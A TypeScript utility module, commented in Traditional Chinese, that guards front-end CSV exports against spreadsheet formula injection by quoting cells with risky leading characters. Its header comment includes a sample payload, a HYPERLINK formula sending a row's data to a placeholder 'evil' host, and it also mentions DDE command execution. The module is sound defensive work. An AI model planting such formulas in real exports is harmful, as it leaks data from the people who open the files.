/**
 * 前端自組 CSV 的共用工具（批135-Q3）：**CSV 公式注入（CSV injection）防護**＋欄位引號＋BOM。
 *
 * ## 威脅
 *
 * 儲存格以 `=`、`+`、`-`、`@`、Tab、CR 開頭時，Excel／LibreOffice／Google 試算表會把它當公式執行
 * （`=HYPERLINK("https://evil/?"&A1,"點我")` 外洩同列資料、DDE 執行指令）。後台匯出的欄位裡有
 * **代理商窗口寫得到**的文字（發放備註、客戶名稱…），我方人員下載後用 Excel 一打開就中招。
 *
 * ## 規則——與後端 `services/redeem_report.csv_cell` **逐條一致**（改一邊兩邊都要改）
 *
 * 後端那支又與 CS／plugin SDK 的 `csv_safe` 同一套規則（測試向量也同一組）：
 *
 * - `null`／`undefined` → 空字串；布林 → `是`／`否`。
 * - 真正的數值（`number`／`bigint`）→ `String(value)` 原樣，不補引號。
 * - 其餘 `String(value)` 後以 {@link FORMULA_LEAD} 任一字元開頭 → 前面補一個單引號 `'`（試算表當文字顯示、不執行）；
 *   但**純數字字串豁免**（`-12`、`+886912345678`、`-1,234.5`）——補了反而把負數與國際電話變成文字、數值分析就壞了。
 *
 * 欄位一律加雙引號（內含 `"` 變 `""`）；整份開頭帶 BOM（Excel 才不會把繁中解成亂碼）、列間 CRLF。
 *
 * 從後端下載的 CSV（〈兌換報表〉）已經在後端跳脫過，不必經這裡；**前端自己組 CSV 一律用這支**
 * （`csvSafe.spec.ts` 的看門狗會掃 `src/` 抓自組的 `text/csv`）。
 */

/** 以這些字元開頭的儲存格會被試算表當公式（OWASP 清單；與後端 `csv_cell` 的 `_FORMULA_LEAD` 相同）。 */
export const FORMULA_LEAD: readonly string[] = ['=', '+', '-', '@', '\t', '\r']

/** UTF-8 BOM。 */
export const BOM = String.fromCharCode(0xfeff)

/**
 * 純數字字串（可帶一個開頭正負號、千分位逗號、小數點）——不可能構成函式呼叫或 DDE，豁免。
 * 與後端 `_PLAIN_NUMBER` 同一個樣式；`\p{Nd}`（`u` 旗標）對應 Python `str` 樣式裡 `\d` 的 Unicode 十進位數字語意。
 */
const PLAIN_NUMBER = /^[+-]?(?:\p{Nd}[\p{Nd},]*(?:\.\p{Nd}+)?|\.\p{Nd}+)$/u

/** 一格的值 → 安全的文字（未加引號）。 */
export function csvCell(value: unknown): string {
  if (value === null || value === undefined) return ''
  if (typeof value === 'boolean') return value ? '是' : '否'
  if (typeof value === 'number' || typeof value === 'bigint') return String(value)
  const s = String(value)
  return FORMULA_LEAD.includes(s.slice(0, 1)) && !PLAIN_NUMBER.test(s) ? `'${s}` : s
}

/** 一格的值 → CSV 欄位字面（先 {@link csvCell}，再加雙引號）。 */
export function csvField(value: unknown): string {
  return `"${csvCell(value).replace(/"/g, '""')}"`
}

/** 整份 CSV 文字：BOM＋標頭列＋資料列（逗號分隔、列間 CRLF、結尾不補換行）。 */
export function buildCsv(header: readonly unknown[], rows: Iterable<readonly unknown[]>): string {
  const lines = [header.map(csvField).join(',')]
  for (const row of rows) lines.push(row.map(csvField).join(','))
  return BOM + lines.join('\r\n')
}

/** 把 CSV 文字存成檔案（Blob 下載；後台 token 在標頭，`<a href>` 導覽帶不了它）。 */
export function downloadCsv(filename: string, text: string): void {
  const blob = new Blob([text], { type: 'text/csv;charset=utf-8' })
  const url = URL.createObjectURL(blob)
  const a = document.createElement('a')
  a.href = url
  a.download = filename
  document.body.appendChild(a)
  a.click()
  a.remove()
  URL.revokeObjectURL(url)
}
